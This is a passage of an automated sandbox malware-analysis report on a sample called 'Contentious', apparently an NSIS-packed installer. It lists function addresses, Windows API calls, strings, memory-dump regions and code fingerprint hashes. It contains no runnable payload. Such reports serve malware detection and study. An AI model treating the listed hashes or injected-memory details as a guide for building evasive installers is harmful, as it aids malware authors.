                                            Function 0015F598 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32a8150f391f291a6c7d6c75a094ebd00c32c3fb84acf5ec05e60e644bc9b85b
                                            • Instruction ID: 6212981105f251344f00c092e9729b0371e7b3475aa3b847c4118aaa295fa488
                                            • Opcode Fuzzy Hash: 32a8150f391f291a6c7d6c75a094ebd00c32c3fb84acf5ec05e60e644bc9b85b
                                            • Instruction Fuzzy Hash: B1E0C2B0D1020ADFCB80EFB884057AEBFF0AB08301FA0896AC925E7241E77496458B81
                                            Function 00152020 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa3cbd763bef459838784e02dd63b2673a8b02fbcbe9e9d7d43c0950719c1c22
                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                            • Opcode Fuzzy Hash: fa3cbd763bef459838784e02dd63b2673a8b02fbcbe9e9d7d43c0950719c1c22
                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                            Function 00158258 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: 7960d51d526fba272fafbbdd8c30103bf7f2efd89ecdb8d8f0d1063ed23c0432
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction Fuzzy Hash: 0BC0123310C1246A9624204F7C409A36B4CD2C17B5D250137F92CE720059429C4441B4
                                            Function 20CB2CA0 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 744c4cf9a46c488ed69b8377bb46f9bd5a84a8a354d09abcd53f37c15ab25109
                                            • Instruction ID: 52a62f4858b1cdf6b325e09ab80fa74306a11e9d811417f023c2bb80769cb905
                                            • Opcode Fuzzy Hash: 744c4cf9a46c488ed69b8377bb46f9bd5a84a8a354d09abcd53f37c15ab25109
                                            • Instruction Fuzzy Hash: 0CD0C736300114774B051B59A8048AF7B6EE7C9771705803BF91DC3710CE714D5297D5
                                            Function 0015A70D Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d469479e75a8e10295a0962b89b0bc0d8e863e9d89d08b5e970906453d5e2275
                                            • Instruction ID: f944856e87a58d2741225c203555037ff45e7d65e2a60780471f63394e48f3e9
                                            • Opcode Fuzzy Hash: d469479e75a8e10295a0962b89b0bc0d8e863e9d89d08b5e970906453d5e2275
                                            • Instruction Fuzzy Hash: D5D0677AB410189FCB049F98EC408DDB7B6FF9C221B448116E915A3261C6319961DB50
                                            Function 00155EA8 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 038de3078f244647568774a859e89904e393ece63d80edc465d17ba43c7b09f8
                                            • Instruction ID: d4f3782ec0b559e3e7a18e372945c8d906636aa02ff1a4ff0ab440ed324f1b49
                                            • Opcode Fuzzy Hash: 038de3078f244647568774a859e89904e393ece63d80edc465d17ba43c7b09f8
                                            • Instruction Fuzzy Hash: DCD02B7440C3814FCB13E330E8A14C83F316BC1306F4006A9F90A4D47BE97805C94B52
                                            Function 0015F014 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea14e12916a64b6fcd8f18aa13759c9c8235858f759d102f3bf2161f2b940fb6
                                            • Instruction ID: c1ba820f1189eccdd4bff922ccdc22a50591a82992dc9d643859d747647b4639
                                            • Opcode Fuzzy Hash: ea14e12916a64b6fcd8f18aa13759c9c8235858f759d102f3bf2161f2b940fb6
                                            • Instruction Fuzzy Hash: 54D06774904118CBCB20DFA4ED482DDB7B0EB85312F1014E7D80DB2610D7305E948F11
                                            Function 00155EB8 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d893521ffb6c03523ba06d701b69e631eadbbf022248c9351a083d1f68cca94b
                                            • Instruction ID: 0d9ec7bcbfc4c9bb18ec26538c8d6b078302e07fa3dbc13e34f2ba622c8e95c3
                                            • Opcode Fuzzy Hash: d893521ffb6c03523ba06d701b69e631eadbbf022248c9351a083d1f68cca94b
                                            • Instruction Fuzzy Hash: C0C012705443198BC541E775E985559776AABC0303F404910B60D0A52AEE7829D547D1

                                            Non-executed Functions

                                            Function 00404A3D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404A55
                                            • GetDlgItem.USER32(?,00000408), ref: 00404A60
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AAA
                                            • LoadBitmapW.USER32(0000006E), ref: 00404ABD
                                            • SetWindowLongW.USER32(?,000000FC,00405035), ref: 00404AD6
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AEA
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AFC
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404B12
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404B1E
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404B30
                                            • DeleteObject.GDI32(00000000), ref: 00404B33
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404B5E
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404B6A
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C00
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404C2B
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C3F
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404C6E
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C7C
                                            • ShowWindow.USER32(?,00000005), ref: 00404C8D
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D8A
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404DEF
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404E04
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404E28
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404E48
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404E5D
                                            • GlobalFree.KERNEL32(?), ref: 00404E6D
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404EE6
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404F8F
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F9E
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FBE
                                            • ShowWindow.USER32(?,00000000), ref: 0040500C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405017
                                            • ShowWindow.USER32(00000000), ref: 0040501E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: 7720069d014a3469b001a8754716979b5100ea042de9afefba1adb90218a578c
                                            • Instruction ID: 984333f753bf963cf7c1d03b693c7aaf3de5c02cdfbc3fe81bdc063d441272a2
                                            • Opcode Fuzzy Hash: 7720069d014a3469b001a8754716979b5100ea042de9afefba1adb90218a578c
                                            • Instruction Fuzzy Hash: C10282B0A00209EFEB209F55DD85AAE7BB5FB84314F50813AF610B62E1C7799D52CF58
                                            Function 004031FF Relevance: 61.6, APIs: 27, Strings: 8, Instructions: 383stringfilecomCOMMON
                                            Download Yara Rule
                                            APIs
                                            • #17.COMCTL32 ref: 0040321E
                                            • SetErrorMode.KERNEL32(00008001), ref: 00403229
                                            • OleInitialize.OLE32(00000000), ref: 00403230
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNEL32(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • SHGetFileInfoW.SHELL32(00420670,00000000,?,000002B4,00000000), ref: 00403258
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                            • GetCommandLineW.KERNEL32(004281C0,NSIS Error), ref: 0040326D
                                            • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 00403280
                                            • CharNextW.USER32(00000000,00434000,00000020), ref: 004032A8
                                            • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 004033E0
                                            • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 004033F1
                                            • lstrcatW.KERNEL32(00436800,\Temp), ref: 004033FD
                                            • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 00403411
                                            • lstrcatW.KERNEL32(00436800,Low), ref: 00403419
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 0040342A
                                            • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 00403432
                                            • DeleteFileW.KERNEL32(00436000), ref: 00403446
                                            • OleUninitialize.OLE32(?), ref: 00403511
                                            • ExitProcess.KERNEL32 ref: 00403531
                                            • lstrcatW.KERNEL32(00436800,~nsu.tmp), ref: 0040353D
                                            • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403549
                                            • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403555
                                            • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040355C
                                            • DeleteFileW.KERNEL32(0041FE70,0041FE70,?,0042A000,?), ref: 004035B6
                                            • CopyFileW.KERNEL32(00437800,0041FE70,00000001), ref: 004035CA
                                            • CloseHandle.KERNEL32(00000000,0041FE70,0041FE70,?,0041FE70,00000000), ref: 004035F7
                                            • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 00403651
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036A9
                                            • ExitProcess.KERNEL32 ref: 004036CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                            • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                            • API String ID: 4107622049-400301585
                                            • Opcode ID: 95c3f265567654738837407e7a8444414da9be9b9da8a0b59aaefb56dafcbaca
                                            • Instruction ID: c7a68613e809908f7bc30205db7760ac1a3991b426edab895fb3ee5f362a6f40
                                            • Opcode Fuzzy Hash: 95c3f265567654738837407e7a8444414da9be9b9da8a0b59aaefb56dafcbaca
                                            • Instruction Fuzzy Hash: CEC1E530604210BAD7206F659C49A2B3EACEB45705F10497FF884B62E2DB7D9A41CB6E
                                            Function 00403B4F Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8B
                                            • ShowWindow.USER32(?), ref: 00403BA8
                                            • DestroyWindow.USER32 ref: 00403BBC
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403BD8
                                            • GetDlgItem.USER32(?,?), ref: 00403BF9
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403C0D
                                            • IsWindowEnabled.USER32(00000000), ref: 00403C14
                                            • GetDlgItem.USER32(?,00000001), ref: 00403CC2
                                            • GetDlgItem.USER32(?,00000002), ref: 00403CCC
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403CE6
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403D37
                                            • GetDlgItem.USER32(?,00000003), ref: 00403DDD
                                            • ShowWindow.USER32(00000000,?), ref: 00403DFE
                                            • EnableWindow.USER32(?,?), ref: 00403E10
                                            • EnableWindow.USER32(?,?), ref: 00403E2B
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E41
                                            • EnableMenuItem.USER32(00000000), ref: 00403E48
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E60
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E73
                                            • lstrlenW.KERNEL32(004226B0,?,004226B0,004281C0), ref: 00403E9C
                                            • SetWindowTextW.USER32(?,004226B0), ref: 00403EB0
                                            • ShowWindow.USER32(?,0000000A), ref: 00403FE4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 184305955-0
                                            • Opcode ID: 0049c567a370e18c81165a0ab0a1ee14fea47e2df6d8df0cdc81817ae1607be3
                                            • Instruction ID: 6759c50de97d02af1a732a3037a26d6f84778d3e6bb250328ac64ecb706e7fc3
                                            • Opcode Fuzzy Hash: 0049c567a370e18c81165a0ab0a1ee14fea47e2df6d8df0cdc81817ae1607be3
                                            • Instruction Fuzzy Hash: C3C18C71A04205BBEB306F21ED85E3B3A6DFB45706F40053EF641B11E1CA79A9529B2E
                                            Function 004056A1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteFileW.KERNEL32(?,?,00436800,74DF3420,00434000), ref: 004056CA
                                            • lstrcatW.KERNEL32(004246B8,\*.*), ref: 00405712
                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405735
                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246B8,?,?,00436800,74DF3420,00434000), ref: 0040573B
                                            • FindFirstFileW.KERNEL32(004246B8,?,?,?,00409014,?,004246B8,?,?,00436800,74DF3420,00434000), ref: 0040574B
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004057EB
                                            • FindClose.KERNEL32(00000000), ref: 004057FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 2035342205-1173974218
                                            • Opcode ID: 1d6fe07955264ea65a1e29388bc46b7735a8228965c209bdf1b74f66f5e15a70
                                            • Instruction ID: 5e0e96141c84f132359e1640c5569076cb8346a5b9e155b5506cdba2f35f624b
                                            • Opcode Fuzzy Hash: 1d6fe07955264ea65a1e29388bc46b7735a8228965c209bdf1b74f66f5e15a70
                                            • Instruction Fuzzy Hash: 3141B331801A14E6CB217B65CC89ABF7778DB86718F10817BF805722D1D77C4A91EE6E
                                            Function 20514F11 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 329COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [O $[O $[O $[O
                                            • API String ID: 0-1010358269
                                            • Opcode ID: 0a0e2c63e5ac76da5371536b715f22e607760947b3d0f14073d88f62ee9c8418
                                            • Instruction ID: d27b93f8da856003a4b35c1521e0a910d742c1a5a3bb33ae40c9d36d888a8eb4
                                            • Opcode Fuzzy Hash: 0a0e2c63e5ac76da5371536b715f22e607760947b3d0f14073d88f62ee9c8418
                                            • Instruction Fuzzy Hash: E9D12B30A00209DFEB04DFE5C888B9DFBF2BF84305F158559E515AB2A5DBB5D985CB80
                                            Function 0040646E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c71c6a85ea4b56a883c261abf5bbd6a62847571a0119542d059843241491b75
                                            • Instruction ID: ae9914dfc4ac9262e96535a7831571a61538a3842dbab95f7124da8c3de4ab96
                                            • Opcode Fuzzy Hash: 8c71c6a85ea4b56a883c261abf5bbd6a62847571a0119542d059843241491b75
                                            • Instruction Fuzzy Hash: 5DF17470D00269CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D3385A96CF44
                                            Function 0015D7F0 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5vq
                                            • API String ID: 0-493797296
                                            • Opcode ID: 54fe09af49f02259781e6a6a5afefc1fd8e5be39ae4e2e8e9377218bd5c407f2
                                            • Instruction ID: cad9b7b794e47fe6348b2963b42435ca2e5f269281bc32686551badb75e965bf
                                            • Opcode Fuzzy Hash: 54fe09af49f02259781e6a6a5afefc1fd8e5be39ae4e2e8e9377218bd5c407f2
                                            • Instruction Fuzzy Hash: 1D529D74E01228CFDB69DF65C884B9DBBB2BF89301F1081E9D809AB255DB359E85CF50
                                            Function 0015E431 Relevance: .7, Instructions: 716COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98b87af48ac57c461e47d95c8c0830e041403b38afeeaa8eedf54368fc1dcadb
                                            • Instruction ID: 5ff336116b6d26ead190ecfbee09beae0f79bffaebdb7e45a35c653b0fd26264
                                            • Opcode Fuzzy Hash: 98b87af48ac57c461e47d95c8c0830e041403b38afeeaa8eedf54368fc1dcadb
                                            • Instruction Fuzzy Hash: 53729F74E01228CFDB68DF69C994BE9BBF2BB49301F1481E9D819AB251D7349E85CF40
                                            Function 20CBF8D8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f73bf349af9922893ece7cd2a93fbbd4cd703957349702f357ebbf1315b44b7
                                            • Instruction ID: 177aca34052ea09fff456fdbffb00af4bbbc12d26fce2013a812c516ebafad60
                                            • Opcode Fuzzy Hash: 0f73bf349af9922893ece7cd2a93fbbd4cd703957349702f357ebbf1315b44b7
                                            • Instruction Fuzzy Hash: 3AC1A174E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D819AB365DB355E85CF50
                                            Function 20CBF480 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e739d0d6fb8471ba27c9672acc3b6ebcd29d25c20e94d8a2cda2a129cbeb4df
                                            • Instruction ID: ca1819597d442b05329acbe55b3af7f56acf770b8547b3504cedd8b876c6ca8a
                                            • Opcode Fuzzy Hash: 5e739d0d6fb8471ba27c9672acc3b6ebcd29d25c20e94d8a2cda2a129cbeb4df
                                            • Instruction Fuzzy Hash: ECC1A074E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D819AB365DB359E85CF50
                                            Function 20CB04A0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bf9ab0182f3890cb4b98475ed3055ccdb42c82040ad078e62754736d57e0e67
                                            • Instruction ID: 62db739e41066c6451a9858bcfd5aa031c04aa265c8a3456b5189727aaa6ef30
                                            • Opcode Fuzzy Hash: 4bf9ab0182f3890cb4b98475ed3055ccdb42c82040ad078e62754736d57e0e67
                                            • Instruction Fuzzy Hash: F1C19B74E00218CFDB14DFA5C994B9DBBF2BB89305F2080A9D819AB365DB359A81CF50
                                            Function 20CBC4B8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 028c06b136770ef9401fb6e44c5d9cd7b6b574781f67c3aa6f400e6b960a39f8
                                            • Instruction ID: eea1bd8206084fef2ae7062de2a5930141d1a0f0c8ba54f8d3dd53d09acc938b
                                            • Opcode Fuzzy Hash: 028c06b136770ef9401fb6e44c5d9cd7b6b574781f67c3aa6f400e6b960a39f8
                                            • Instruction Fuzzy Hash: 9DC1A0B4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D819AB365DB355E85CF10
                                            Function 20CB0040 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73751cb200799d8df23dcd0c1637ebf5ee87a32db327aea104782576c34a18de
                                            • Instruction ID: a0101c2c241e713aceb21e3c6a84e6a749725b79b9e0108db6bb2dd927b35348
                                            • Opcode Fuzzy Hash: 73751cb200799d8df23dcd0c1637ebf5ee87a32db327aea104782576c34a18de
                                            • Instruction Fuzzy Hash: 66C19B74E00218CFDB14DFA5D994B9DBBF2BF89305F2080A9D819AB365DB359A85CF10
                                            Function 20CBC060 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
